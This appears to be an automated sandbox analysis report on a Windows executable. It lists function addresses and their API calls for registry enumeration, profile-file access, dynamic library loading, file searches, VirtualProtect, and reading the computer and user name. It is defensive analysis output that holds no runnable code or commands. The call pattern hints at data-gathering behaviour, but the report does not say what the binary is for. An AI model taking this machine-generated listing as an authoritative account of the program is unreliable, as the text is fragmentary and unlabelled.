33544 40cdda 7 API calls 33372->33544 33373 40cece 33376 40cf3f 33373->33376 33496 40c3d0 memset GetModuleFileNameA strrchr 33373->33496 33376->33297 33376->33298 33379 40ceed 33523 40affa 33379->33523 33383->33295 33384->33304 33385->33286 33386->33292 33387->33300 33396 406fc7 memset _mbscpy 33388->33396 33390 40709f CreateFontIndirectA 33390->33333 33392 4019e1 33391->33392 33393 4019c2 strncat 33392->33393 33394 4019e5 memset LoadIconA 33392->33394 33393->33392 33394->33336 33395->33328 33396->33390 33397->33350 33399 407a65 33398->33399 33400 407a5b ??3@YAXPAX 33398->33400 33399->33352 33400->33399 33401->33350 33403 406f37 malloc 33402->33403 33404 406f7d 33402->33404 33406 406f73 33403->33406 33407 406f58 33403->33407 33404->33350 33406->33350 33408 406f6c ??3@YAXPAX 33407->33408 33409 406f5c memcpy 33407->33409 33408->33406 33409->33408 33411 407a38 33410->33411 33412 407a2d ??3@YAXPAX 33410->33412 33414 406f30 3 API calls 33411->33414 33413 407a43 33412->33413 33415 40796e 7 API calls 33413->33415 33414->33413 33415->33340 33432 406f96 GetModuleFileNameA 33416->33432 33418 409805 strrchr 33419 409814 33418->33419 33420 409817 _mbscat 33418->33420 33419->33420 33420->33358 33433 44b090 33421->33433 33426 40930c 3 API calls 33427 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33426->33427 33428 4097c5 LoadStringA 33427->33428 33429 4097db 33428->33429 33429->33428 33431 4097f3 33429->33431 33440 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33429->33440 33431->33278 33432->33418 33434 40973e _mbscpy _mbscpy 33433->33434 33435 40930c 33434->33435 33436 44b090 33435->33436 33437 409319 memset GetPrivateProfileStringA 33436->33437 33438 409374 33437->33438 33439 409364 WritePrivateProfileStringA 33437->33439 33438->33426 33439->33438 33440->33429 33451 406f81 GetFileAttributesA 33441->33451 33443 409675 33444 4096ee 33443->33444 33445 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33443->33445 33444->33279 33452 409278 GetPrivateProfileStringA 33445->33452 33447 4096c9 33453 409278 GetPrivateProfileStringA 33447->33453 33449 4096da 33454 409278 GetPrivateProfileStringA 33449->33454 33451->33443 33452->33447 33453->33449 33454->33444 33546 409c1c 33455->33546 33458 401e69 memset 33585 410dbb 33458->33585 33461 401ec2 33615 4070e3 strlen _mbscat _mbscpy _mbscat 33461->33615 33462 401ed4 33600 406f81 GetFileAttributesA 33462->33600 33465 401ee6 strlen strlen 33467 401f15 33465->33467 33469 401f28 33465->33469 33616 4070e3 strlen _mbscat _mbscpy _mbscat 33467->33616 33601 406f81 GetFileAttributesA 33469->33601 33471 401f35 33602 401c31 33471->33602 33474 401f75 33614 410a9c RegOpenKeyExA 33474->33614 33475 401c31 7 API calls 33475->33474 33477 401f91 33478 402187 33477->33478 33479 401f9c memset 33477->33479 33481 402195 ExpandEnvironmentStringsA 33478->33481 33482 4021a8 _strcmpi 33478->33482 33617 410b62 RegEnumKeyExA 33479->33617 33626 406f81 GetFileAttributesA 33481->33626 33482->33372 33482->33373 33484 40217e RegCloseKey 33484->33478 33485 401fd9 atoi 33486 401fef memset memset sprintf 33485->33486 33493 401fc9 33485->33493 33618 410b1e 33486->33618 33489 402165 33489->33484 33490 402076 memset memset strlen strlen 33490->33493 33491 4070e3 strlen _mbscat _mbscpy _mbscat 33491->33493 33492 4020dd strlen strlen 33492->33493 33493->33484 33493->33485 33493->33489 33493->33490 33493->33491 33493->33492 33494 406f81 GetFileAttributesA 33493->33494 33495 402167 _mbscpy 33493->33495 33625 410b62 RegEnumKeyExA 33493->33625 33494->33493 33495->33484 33497 40c422 33496->33497 33498 40c425 _mbscat _mbscpy _mbscpy 33496->33498 33497->33498 33499 40c49d 33498->33499 33500 40c512 33499->33500 33501 40c502 GetWindowPlacement 33499->33501 33502 40c538 33500->33502 33647 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33500->33647 33501->33500 33640 409b31 33502->33640 33506 40ba28 33507 40ba87 33506->33507 33513 40ba3c 33506->33513 33650 406c62 LoadCursorA SetCursor 33507->33650 33509 40ba43 _mbsicmp 33509->33513 33510 40ba8c 33651 404734 33510->33651 33659 4107f1 33510->33659 33662 404785 33510->33662 33665 403c16 33510->33665 33741 410a9c RegOpenKeyExA 33510->33741 33511 40baa0 33512 407e30 _strcmpi 33511->33512 33516 40bab0 33512->33516 33513->33507 33513->33509 33742 40b5e5 10 API calls 33513->33742 33514 40bafa SetCursor 33514->33379 33516->33514 33517 40baf1 qsort 33516->33517 33517->33514 34103 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33523->34103 33525 40b00e 33526 40b016 33525->33526 33527 40b01f GetStdHandle 33525->33527 34104 406d1a CreateFileA 33526->34104 33529 40b01c 33527->33529 33530 40b035 33529->33530 33531 40b12d 33529->33531 34105 406c62 LoadCursorA SetCursor 33530->34105 34109 406d77 9 API calls 33531->34109 33534 40b136 33545 40c580 28 API calls 33534->33545 33535 40b042 33537 40b087 33535->33537 33542 40b0a1 33535->33542 34106 40a57c strlen WriteFile 33535->34106 33537->33542 34107 40a699 12 API calls 33537->34107 33539 40b0d6 33540 40b116 CloseHandle 33539->33540 33541 40b11f SetCursor 33539->33541 33540->33541 33541->33534 33542->33539 34108 406d77 9 API calls 33542->34108 33544->33373 33545->33376 33558 409a32 33546->33558 33549 409c80 memcpy memcpy 33550 409cda 33549->33550 33550->33549 33551 409d18 ??2@YAPAXI ??2@YAPAXI 33550->33551 33555 408db6 12 API calls 33550->33555 33553 409d54 ??2@YAPAXI 33551->33553 33554 409d8b 33551->33554 33553->33554 33568 409b9c 33554->33568 33555->33550 33557 4023c1 33557->33458 33559 409a44 33558->33559 33560 409a3d ??3@YAXPAX 33558->33560 33561 409a52 33559->33561 33562 409a4b ??3@YAXPAX 33559->33562 33560->33559 33563 409a63 33561->33563 33564 409a5c ??3@YAXPAX 33561->33564 33562->33561 33565 409a83 ??2@YAPAXI ??2@YAPAXI 33563->33565 33566 409a73 ??3@YAXPAX 33563->33566 33567 409a7c ??3@YAXPAX 33563->33567 33564->33563 33565->33549 33566->33567 33567->33565 33569 407a55 ??3@YAXPAX 33568->33569 33570 409ba5 33569->33570 33571 407a55 ??3@YAXPAX 33570->33571 33572 409bad 33571->33572 33573 407a55 ??3@YAXPAX 33572->33573 33574 409bb5 33573->33574 33575 407a55 ??3@YAXPAX 33574->33575 33576 409bbd 33575->33576 33577 407a1f 4 API calls 33576->33577 33578 409bd0 33577->33578 33579 407a1f 4 API calls 33578->33579 33580 409bda 33579->33580 33581 407a1f 4 API calls 33580->33581 33582 409be4 33581->33582 33583 407a1f 4 API calls 33582->33583 33584 409bee 33583->33584 33584->33557 33586 410d0e 2 API calls 33585->33586 33587 410dca 33586->33587 33588 410dfd memset 33587->33588 33627 4070ae 33587->33627 33589 410e1d 33588->33589 33630 410a9c RegOpenKeyExA 33589->33630 33592 401e9e strlen strlen 33592->33461 33592->33462 33594 410e4a 33595 410e7f _mbscpy 33594->33595 33631 410d3d _mbscpy 33594->33631 33595->33592 33597 410e5b 33632 410add RegQueryValueExA 33597->33632 33599 410e73 RegCloseKey 33599->33595 33600->33465 33601->33471 33633 410a9c RegOpenKeyExA 33602->33633 33604 401c4c 33605 401cad 33604->33605 33634 410add RegQueryValueExA 33604->33634 33605->33474 33605->33475 33607 401c6a 33608 401c71 strchr 33607->33608 33609 401ca4 RegCloseKey 33607->33609 33608->33609 33610 401c85 strchr 33608->33610 33609->33605 33610->33609 33611 401c94 33610->33611 33635 406f06 strlen 33611->33635 33613 401ca1 33613->33609 33614->33477 33615->33462 33616->33469 33617->33493 33638 410a9c RegOpenKeyExA 33618->33638 33620 410b34 33621 410b5d 33620->33621 33639 410add RegQueryValueExA 33620->33639 33621->33493 33623 410b4c RegCloseKey 33623->33621 33625->33493 33626->33482 33628 4070bd GetVersionExA 33627->33628 33629 4070ce 33627->33629 33628->33629 33629->33588 33629->33592 33630->33594 33631->33597 33632->33599 33633->33604 33634->33607 33636 406f17 33635->33636 33637 406f1a memcpy 33635->33637 33636->33637 33637->33613 33638->33620 33639->33623 33641 409b40 33640->33641 33643 409b4e 33640->33643 33648 409901 memset SendMessageA 33641->33648 33644 409b99 33643->33644 33645 409b8b 33643->33645 33644->33506 33649 409868 SendMessageA 33645->33649 33647->33502 33648->33643 33649->33644 33650->33510 33652 404785 FreeLibrary 33651->33652 33653 40473b LoadLibraryA 33652->33653 33654 40474c GetProcAddress 33653->33654 33657 40476e 33653->33657 33655 404764 33654->33655 33654->33657 33655->33657 33656 404781 33656->33511 33657->33656 33658 404785 FreeLibrary 33657->33658 33658->33656 33660 410807 33659->33660 33661 4107fc FreeLibrary 33659->33661 33660->33511 33661->33660 33663 4047a3 33662->33663 33664 404799 FreeLibrary 33662->33664 33663->33511 33664->33663 33666 4107f1 FreeLibrary 33665->33666 33667 403c30 LoadLibraryA 33666->33667 33668 403c74 33667->33668 33669 403c44 GetProcAddress 33667->33669 33670 4107f1 FreeLibrary 33668->33670 33669->33668 33671 403c5e 33669->33671 33672 403c7b 33670->33672 33671->33668 33674 403c6b 33671->33674 33673 404734 3 API calls 33672->33673 33675 403c86 33673->33675 33674->33672 33743 4036e5 33675->33743 33678 4036e5 26 API calls 33679 403c9a 33678->33679 33680 4036e5 26 API calls 33679->33680 33681 403ca4 33680->33681 33682 4036e5 26 API calls 33681->33682 33683 403cae 33682->33683 33755 4085d2 33683->33755 33691 403ce5 33692 403cf7 33691->33692 33936 402bd1 39 API calls 33691->33936 33801 410a9c RegOpenKeyExA 33692->33801 33695 403d0a 33696 403d1c 33695->33696 33937 402bd1 39 API calls 33695->33937 33802 402c5d 33696->33802 33700 4070ae GetVersionExA 33701 403d31 33700->33701 33820 410a9c RegOpenKeyExA 33701->33820 33703 403d51 33704 403d61 33703->33704 33938 402b22 46 API calls 33703->33938 33821 410a9c RegOpenKeyExA 33704->33821 33707 403d87 33708 403d97 33707->33708 33939 402b22 46 API calls 33707->33939 33822 410a9c RegOpenKeyExA 33708->33822 33711 403dbd 33712 403dcd 33711->33712 33940 402b22 46 API calls 33711->33940 33823 410808 33712->33823 33716 404785 FreeLibrary 33717 403de8 33716->33717 33827 402fdb 33717->33827 33720 402fdb 34 API calls 33721 403e00 33720->33721 33843 4032b7 33721->33843 33730 403e3b 33732 403e73 33730->33732 33733 403e46 _mbscpy 33730->33733 33890 40fb00 33732->33890 33942 40f334 334 API calls 33733->33942 33741->33511 33742->33513 33744 4037c5 33743->33744 33745 4036fb 33743->33745 33744->33678 33943 410863 UuidFromStringA UuidFromStringA memcpy 33745->33943 33747 40370e 33747->33744 33748 403716 strchr 33747->33748 33748->33744 33749 403730 33748->33749 33944 4021b6 memset 33749->33944 33751 40373f _mbscpy _mbscpy strlen 33752 4037a4 _mbscpy 33751->33752 33753 403789 sprintf 33751->33753 33945 4023e5 16 API calls 33752->33945 33753->33752 33756 4085e2 33755->33756 33946 4082cd 11 API calls 33756->33946 33760 408600 33761 403cba 33760->33761 33762 40860b memset 33760->33762 33773 40821d 33761->33773 33949 410b62 RegEnumKeyExA 33762->33949 33764 4086d2 RegCloseKey 33764->33761 33766 408637 33766->33764 33767 40865c memset 33766->33767 33950 410a9c RegOpenKeyExA 33766->33950 33953 410b62 RegEnumKeyExA 33766->33953 33951 410add RegQueryValueExA 33767->33951 33770 408694 33952 40848b 10 API calls 33770->33952 33772 4086ab RegCloseKey 33772->33766 33954 410a9c RegOpenKeyExA 33773->33954 33775 40823f 33776 403cc6 33775->33776 33777 408246 memset 33775->33777 33785 4086e0 33776->33785 33955 410b62 RegEnumKeyExA 33777->33955 33779 4082bf RegCloseKey 33779->33776 33781 40826f 33781->33779 33956 410a9c RegOpenKeyExA 33781->33956 33957 4080ed 11 API calls 33781->33957 33958 410b62 RegEnumKeyExA 33781->33958 33784 4082a2 RegCloseKey 33784->33781 33959 4045db 33785->33959 33787 4088ef 33967 404656 33787->33967 33791 408737 wcslen 33791->33787 33797 40876a 33791->33797 33792 40877a _wcsncoll 33792->33797 33794 404734 3 API calls 33794->33797 33795 404785 FreeLibrary 33795->33797 33796 408812 memset 33796->33797 33798 40883c memcpy wcschr 33796->33798 33797->33787 33797->33792 33797->33794 33797->33795 33797->33796 33797->33798 33799 4088c3 LocalFree 33797->33799 33970 40466b _mbscpy 33797->33970 33798->33797 33799->33797 33800 410a9c RegOpenKeyExA 33800->33691 33801->33695 33971 410a9c RegOpenKeyExA 33802->33971 33804 402c7a 33805 402da5 33804->33805 33806 402c87 memset 33804->33806 33805->33700 33972 410b62 RegEnumKeyExA 33806->33972 33808 402d9c RegCloseKey 33808->33805 33809 410b1e 3 API calls 33810 402ce4 memset sprintf 33809->33810 33973 410a9c RegOpenKeyExA 33810->33973 33812 402d28 33813 402d3a sprintf 33812->33813 33974 402bd1 39 API calls 33812->33974 33975 410a9c RegOpenKeyExA 33813->33975 33816 402cb2 33816->33808 33816->33809 33819 402d9a 33816->33819 33976 402bd1 39 API calls 33816->33976 33977 410b62 RegEnumKeyExA 33816->33977 33819->33808 33820->33703 33821->33707 33822->33711 33824 410816 33823->33824 33825 4107f1 FreeLibrary 33824->33825 33826 403ddd 33825->33826 33826->33716 33978 410a9c RegOpenKeyExA 33827->33978 33829 402ff9 33830 403006 memset 33829->33830 33831 40312c 33829->33831 33979 410b62 RegEnumKeyExA 33830->33979 33831->33720 33833 403122 RegCloseKey 33833->33831 33834 410b1e 3 API calls 33835 403058 memset sprintf 33834->33835 33980 410a9c RegOpenKeyExA 33835->33980 33837 403033 33837->33833 33837->33834 33838 4030a2 memset 33837->33838 33839 410b62 RegEnumKeyExA 33837->33839 33841 4030f9 RegCloseKey 33837->33841 33982 402db3 26 API calls 33837->33982 33981 410b62 RegEnumKeyExA 33838->33981 33839->33837 33841->33837 33844 4032d5 33843->33844 33845 4033a9 33843->33845 33983 4021b6 memset 33844->33983 33858 4034e4 memset memset 33845->33858 33847 4032e1 33984 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33847->33984 33849 4032ea 33850 4032f8 memset GetPrivateProfileSectionA 33849->33850 33985 4023e5 16 API calls 33849->33985 33850->33845 33855 40332f 33850->33855 33852 40339b strlen 33852->33845 33852->33855 33854 403350 strchr 33854->33855 33855->33845 33855->33852 33986 4021b6 memset 33855->33986 33987 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33855->33987 33988 4023e5 16 API calls 33855->33988 33859 410b1e 3 API calls 33858->33859 33860 40353f 33859->33860 33861 40357f 33860->33861 33862 403546 _mbscpy 33860->33862 33866 403985 33861->33866 33989 406d55 strlen _mbscat 33862->33989 33864 403565 _mbscat 33990 4033f0 19 API calls 33864->33990 33991 40466b _mbscpy 33866->33991 33870 4039aa 33872 4039ff 33870->33872 33992 40f460 memset memset 33870->33992 34013 40f6e2 33870->34013 34029 4038e8 21 API calls 33870->34029 33873 404785 FreeLibrary 33872->33873 33874 403a0b 33873->33874 33875 4037ca memset memset 33874->33875 34037 444551 memset 33875->34037 33877 4038e2 33877->33730 33941 40f334 334 API calls 33877->33941 33880 40382e 33881 406f06 2 API calls 33880->33881 33882 403843 33881->33882 33883 406f06 2 API calls 33882->33883 33884 403855 strchr 33883->33884 33885 403884 _mbscpy 33884->33885 33886 403897 strlen 33884->33886 33887 4038bf _mbscpy 33885->33887 33886->33887 33888 4038a4 sprintf 33886->33888 34049 4023e5 16 API calls 33887->34049 33888->33887 33891 44b090 33890->33891 33892 40fb10 RegOpenKeyExA 33891->33892 33893 403e7f 33892->33893 33894 40fb3b RegOpenKeyExA 33892->33894 33904 40f96c 33893->33904 33895 40fb55 RegQueryValueExA 33894->33895 33896 40fc2d RegCloseKey 33894->33896 33897 40fc23 RegCloseKey 33895->33897 33898 40fb84 33895->33898 33896->33893 33897->33896 33899 404734 3 API calls 33898->33899 33900 40fb91 33899->33900 33900->33897 33901 40fc19 LocalFree 33900->33901 33902 40fbdd memcpy memcpy 33900->33902 33901->33897 34054 40f802 11 API calls 33902->34054 33905 4070ae GetVersionExA 33904->33905 33906 40f98d 33905->33906 33907 4045db 7 API calls 33906->33907 33911 40f9a9 33907->33911 33908 40fae6 33909 404656 FreeLibrary 33908->33909 33910 403e85 33909->33910 33916 4442ea memset 33910->33916 33911->33908 33912 40fa13 memset WideCharToMultiByte 33911->33912 33912->33911 33913 40fa43 _strnicmp 33912->33913 33913->33911 33914 40fa5b WideCharToMultiByte 33913->33914 33914->33911 33915 40fa88 WideCharToMultiByte 33914->33915 33915->33911 33917 410dbb 9 API calls 33916->33917 33918 444329 33917->33918 34055 40759e strlen strlen 33918->34055 33923 410dbb 9 API calls 33924 444350 33923->33924 33925 40759e 3 API calls 33924->33925 33926 44435a 33925->33926 33927 444212 65 API calls 33926->33927 33928 444366 memset memset 33927->33928 33929 410b1e 3 API calls 33928->33929 33930 4443b9 ExpandEnvironmentStringsA strlen 33929->33930 33931 4443f4 _strcmpi 33930->33931 33932 4443e5 33930->33932 33933 403e91 33931->33933 33934 44440c 33931->33934 33932->33931 33933->33511 33935 444212 65 API calls 33934->33935 33935->33933 33936->33692 33937->33696 33938->33704 33939->33708 33940->33712 33941->33730 33942->33732 33943->33747 33944->33751 33945->33744 33947 40841c 33946->33947 33948 410a9c RegOpenKeyExA 33947->33948 33948->33760 33949->33766 33950->33766 33951->33770 33952->33772 33953->33766 33954->33775 33955->33781 33956->33781 33957->33784 33958->33781 33960 404656 FreeLibrary 33959->33960 33961 4045e3 LoadLibraryA 33960->33961 33962 404651 33961->33962 33963 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33961->33963 33962->33787 33962->33791 33964 40463d 33963->33964 33965 404643 33964->33965 33966 404656 FreeLibrary 33964->33966 33965->33962 33966->33962 33968 403cd2 33967->33968 33969 40465c FreeLibrary 33967->33969 33968->33800 33969->33968 33970->33797 33971->33804 33972->33816 33973->33812 33974->33813 33975->33816 33976->33816 33977->33816 33978->33829 33979->33837 33980->33837 33981->33837 33982->33837 33983->33847 33984->33849 33985->33850 33986->33854 33987->33855 33988->33855 33989->33864 33990->33861 33991->33870 34030 4078ba 33992->34030 33995 4078ba _mbsnbcat 33996 40f5a3 RegOpenKeyExA 33995->33996 33997 40f5c3 RegQueryValueExA 33996->33997 33998 40f6d9 33996->33998 33999 40f6d0 RegCloseKey 33997->33999 34000 40f5f0 33997->34000 33998->33870 33999->33998 34000->33999 34001 40f675 34000->34001 34034 40466b _mbscpy 34000->34034 34001->33999 34035 4012ee strlen 34001->34035 34003 40f611 34005 404734 3 API calls 34003->34005 34010 40f616 34005->34010 34006 40f69e RegQueryValueExA 34006->33999 34007 40f6c1 34006->34007 34007->33999 34008 40f66a 34009 404785 FreeLibrary 34008->34009 34009->34001 34010->34008 34011 40f661 LocalFree 34010->34011 34012 40f645 memcpy 34010->34012 34011->34008 34012->34011 34036 40466b _mbscpy 34013->34036 34015 40f6fa 34016 4045db 7 API calls 34015->34016 34017 40f708 34016->34017 34018 404734 3 API calls 34017->34018 34023 40f7e2 34017->34023 34024 40f715 34018->34024 34019 404656 FreeLibrary 34020 40f7f1 34019->34020 34021 404785 FreeLibrary 34020->34021 34022 40f7fc 34021->34022 34022->33870 34023->34019 34024->34023 34025 40f797 WideCharToMultiByte 34024->34025 34026 40f7b8 strlen 34025->34026 34027 40f7d9 LocalFree 34025->34027 34026->34027 34028 40f7c8 _mbscpy 34026->34028 34027->34023 34028->34027 34029->33870 34031 4078e6 34030->34031 34032 4078c7 _mbsnbcat 34031->34032 34033 4078ea 34031->34033 34032->34031 34033->33995 34034->34003 34035->34006 34036->34015 34050 410a9c RegOpenKeyExA 34037->34050 34039 44458b 34040 40381a 34039->34040 34051 410add RegQueryValueExA 34039->34051 34040->33877 34048 4021b6 memset 34040->34048 34042 4445a4 34043 4445dc RegCloseKey 34042->34043 34052 410add RegQueryValueExA 34042->34052 34043->34040 34045 4445c1 34045->34043 34053 444879 30 API calls 34045->34053 34047 4445da 34047->34043 34048->33880 34049->33877 34050->34039 34051->34042 34052->34045 34053->34047 34054->33901 34056 4075c9 34055->34056 34057 4075bb _mbscat 34055->34057 34058 444212 34056->34058 34057->34056 34075 407e9d 34058->34075 34061 44424d 34062 444274 34061->34062 34063 444258 34061->34063 34083 407ef8 34061->34083 34064 407e9d 9 API calls 34062->34064 34100 444196 52 API calls 34063->34100 34071 4442a0 34064->34071 34066 407ef8 9 API calls 34066->34071 34067 4442ce 34097 407f90 34067->34097 34071->34066 34071->34067 34073 444212 65 API calls 34071->34073 34093 407e62 34071->34093 34072 407f90 FindClose 34074 4442e4 34072->34074 34073->34071 34074->33923 34076 407f90 FindClose 34075->34076 34077 407eaa 34076->34077 34078 406f06 2 API calls 34077->34078 34079 407ebd strlen strlen 34078->34079 34080 407ee1 34079->34080 34081 407eea 34079->34081 34101 4070e3 strlen _mbscat _mbscpy _mbscat 34080->34101 34081->34061 34084 407f03 FindFirstFileA 34083->34084 34085 407f24 FindNextFileA 34083->34085 34086 407f3f 34084->34086 34087 407f46 strlen strlen 34085->34087 34088 407f3a 34085->34088 34086->34087 34090 407f7f 34086->34090 34087->34090 34091 407f76 34087->34091 34089 407f90 FindClose 34088->34089 34089->34086 34090->34061 34102 4070e3 strlen _mbscat _mbscpy _mbscat 34091->34102 34094 407e6c strcmp 34093->34094 34096 407e94 34093->34096 34095 407e83 strcmp 34094->34095 34094->34096 34095->34096 34096->34071 34098 407fa3 34097->34098 34099 407f99 FindClose 34097->34099 34098->34072 34099->34098 34100->34061 34101->34081 34102->34090 34103->33525 34104->33529 34105->33535 34106->33537 34107->33542 34108->33539 34109->33534 34118 411853 RtlInitializeCriticalSection memset 34119 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34292 40a256 13 API calls 34294 432e5b 17 API calls 34296 43fa5a 20 API calls 34121 401060 41 API calls 34299 427260 CloseHandle memset memset 33198 410c68 FindResourceA 33199 410c81 SizeofResource 33198->33199 33202 410cae 33198->33202 33200 410c92 LoadResource 33199->33200 33199->33202 33201 410ca0 LockResource 33200->33201 33200->33202 33201->33202 34301 405e69 14 API calls 34126 433068 15 API calls __fprintf_l 34303 414a6d 18 API calls 34304 43fe6f 134 API calls 34128 424c6d 15 API calls __fprintf_l 34305 426741 19 API calls 34130 440c70 17 API calls 34131 443c71 44 API calls 34134 427c79 24 API calls 34308 416e7e memset __fprintf_l 34138 42800b 47 API calls 34139 425115 85 API calls __fprintf_l 34311 41960c 61 API calls 34140 43f40c 122 API calls __fprintf_l 34143 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34144 43f81a 20 API calls 34146 414c20 memset memset 34147 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34315 414625 18 API calls 34316 404225 modf 34317 403a26 strlen WriteFile 34319 40422a 12 API calls 34323 427632 memset memset memcpy 34324 40ca30 59 API calls 34325 404235 26 API calls 34148 42ec34 61 API calls __fprintf_l 34149 425115 76 API calls __fprintf_l 34326 425115 77 API calls __fprintf_l 34328 44223a 38 API calls 34155 43183c 112 API calls 34329 44b2c5 _onexit __dllonexit 34334 42a6d2 memcpy __allrem 34157 405cda 65 API calls 34342 43fedc 138 API calls 34343 4116e1 16 API calls __fprintf_l 34160 4244e6 19 API calls 34162 42e8e8 127 API calls __fprintf_l 34163 4118ee RtlLeaveCriticalSection 34348 43f6ec 22 API calls 34165 425115 119 API calls __fprintf_l 33188 410cf3 EnumResourceNamesA 34351 4492f0 memcpy memcpy 34353 43fafa 18 API calls 34355 4342f9 15 API calls __fprintf_l 34166 4144fd 19 API calls 34357 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34358 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34361 443a84 _mbscpy 34363 43f681 17 API calls 34169 404487 22 API calls 34365 415e8c 16 API calls __fprintf_l 34173 411893 RtlDeleteCriticalSection __fprintf_l 34174 41a492 42 API calls 34369 403e96 34 API calls 34370 410e98 memset SHGetPathFromIDList SendMessageA 34176 426741 109 API calls __fprintf_l 34177 4344a2 18 API calls 34178 4094a2 10 API calls 34373 4116a6 15 API calls __fprintf_l 34374 43f6a4 17 API calls 34375 440aa3 20 API calls 34377 427430 45 API calls 34181 4090b0 7 API calls 34182 4148b0 15 API calls 34184 4118b4 RtlEnterCriticalSection 34185 4014b7 CreateWindowExA 34186 40c8b8 19 API calls 34188 4118bf RtlTryEnterCriticalSection 34382 42434a 18 API calls __fprintf_l 34384 405f53 12 API calls 34196 43f956 59 API calls 34198 40955a 17 API calls 34199 428561 36 API calls 34200 409164 7 API calls 34388 404366 19 API calls 34392 40176c ExitProcess 34395 410777 42 API calls 34205 40dd7b 51 API calls 34206 425d7c 16 API calls __fprintf_l 34397 43f6f0 25 API calls 34398 42db01 22 API calls 34207 412905 15 API calls __fprintf_l 34399 403b04 54 API calls 34400 405f04 SetDlgItemTextA GetDlgItemTextA 34401 44b301 ??3@YAXPAX 34404 4120ea 14 API calls 3 library calls 34405 40bb0a 8 API calls 34407 413f11 strcmp 34211 434110 17 API calls __fprintf_l 34214 425115 108 API calls __fprintf_l 34408 444b11 _onexit 34216 425115 76 API calls __fprintf_l 34219 429d19 10 API calls 34411 444b1f __dllonexit 34412 409f20 _strcmpi 34221 42b927 31 API calls 34415 433f26 19 API calls __fprintf_l 34416 44b323 FreeLibrary 34417 427f25 46 API calls 34418 43ff2b 17 API calls 34419 43fb30 19 API calls 34228 414d36 16 API calls 34230 40ad38 7 API calls 34421 433b38 16 API calls __fprintf_l 34422 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34234 426741 21 API calls 34235 40c5c3 125 API calls 34237 43fdc5 17 API calls 34423 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34240 4161cb memcpy memcpy memcpy memcpy 33203 44b3cf 33204 44b3e6 33203->33204 33206 44b454 33203->33206 33204->33206 33210 44b40e 33204->33210 33207 44b405 33207->33206 33208 44b435 VirtualProtect 33207->33208 33208->33206 33209 44b444 VirtualProtect 33208->33209 33209->33206 33211 44b413 33210->33211 33214 44b454 33211->33214 33217 44b42b 33211->33217 33213 44b41c 33213->33214 33215 44b435 VirtualProtect 33213->33215 33215->33214 33216 44b444 VirtualProtect 33215->33216 33216->33214 33218 44b431 33217->33218 33219 44b435 VirtualProtect 33218->33219 33221 44b454 33218->33221 33220 44b444 VirtualProtect 33219->33220 33219->33221 33220->33221 34428 43ffc8 18 API calls 34241 4281cc 15 API calls __fprintf_l 34430 4383cc 110 API calls __fprintf_l 34242 4275d3 41 API calls 34431 4153d3 22 API calls __fprintf_l 34243 444dd7 _XcptFilter 34436 4013de 15 API calls 34438 425115 111 API calls __fprintf_l 34439 43f7db 18 API calls 34442 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34245 4335ee 16 API calls __fprintf_l 34444 429fef 11 API calls 34246 444deb _exit _c_exit 34445 40bbf0 138 API calls 34249 425115 79 API calls __fprintf_l 34449 437ffa 22 API calls 34253 4021ff 14 API calls 34254 43f5fc 149 API calls 34450 40e381 9 API calls 34256 405983 40 API calls 34257 42b186 27 API calls __fprintf_l 34258 427d86 76 API calls 34259 403585 20 API calls 34261 42e58e 18 API calls __fprintf_l 34264 425115 75 API calls __fprintf_l 34266 401592 8 API calls 33189 410b92 33192 410a6b 33189->33192 33191 410bb2 33193 410a77 33192->33193 33194 410a89 GetPrivateProfileIntA 33192->33194 33197 410983 memset _itoa WritePrivateProfileStringA 33193->33197 33194->33191 33196 410a84 33196->33191 33197->33196 34454 434395 16 API calls 34268 441d9c memcmp 34456 43f79b 119 API calls 34269 40c599 43 API calls 34457 426741 87 API calls 34273 4401a6 21 API calls 34275 426da6 memcpy memset memset memcpy 34276 4335a5 15 API calls 34278 4299ab memset memset memcpy memset memset 34279 40b1ab 8 API calls 34462 425115 76 API calls __fprintf_l 34466 4113b2 18 API calls 2 library calls 34470 40a3b8 memset sprintf SendMessageA 33222 410bbc 33225 4109cf 33222->33225 33226 4109dc 33225->33226 33227 410a23 memset GetPrivateProfileStringA 33226->33227 33228 4109ea memset 33226->33228 33233 407646 strlen 33227->33233 33238 4075cd sprintf memcpy 33228->33238 33231 410a0c WritePrivateProfileStringA 33232 410a65 33231->33232 33234 40765a 33233->33234 33235 40765c 33233->33235 33234->33232 33236 4076a3 33235->33236 33239 40737c strtoul 33235->33239 33236->33232 33238->33231 33239->33235 34281 40b5bf memset memset _mbsicmp

                  Executed Functions

                  Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                  APIs
                  • memset.MSVCRT ref: 0040832F
                  • memset.MSVCRT ref: 00408343
                  • memset.MSVCRT ref: 0040835F
                  • memset.MSVCRT ref: 00408376
                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                  • strlen.MSVCRT ref: 004083E9
                  • strlen.MSVCRT ref: 004083F8
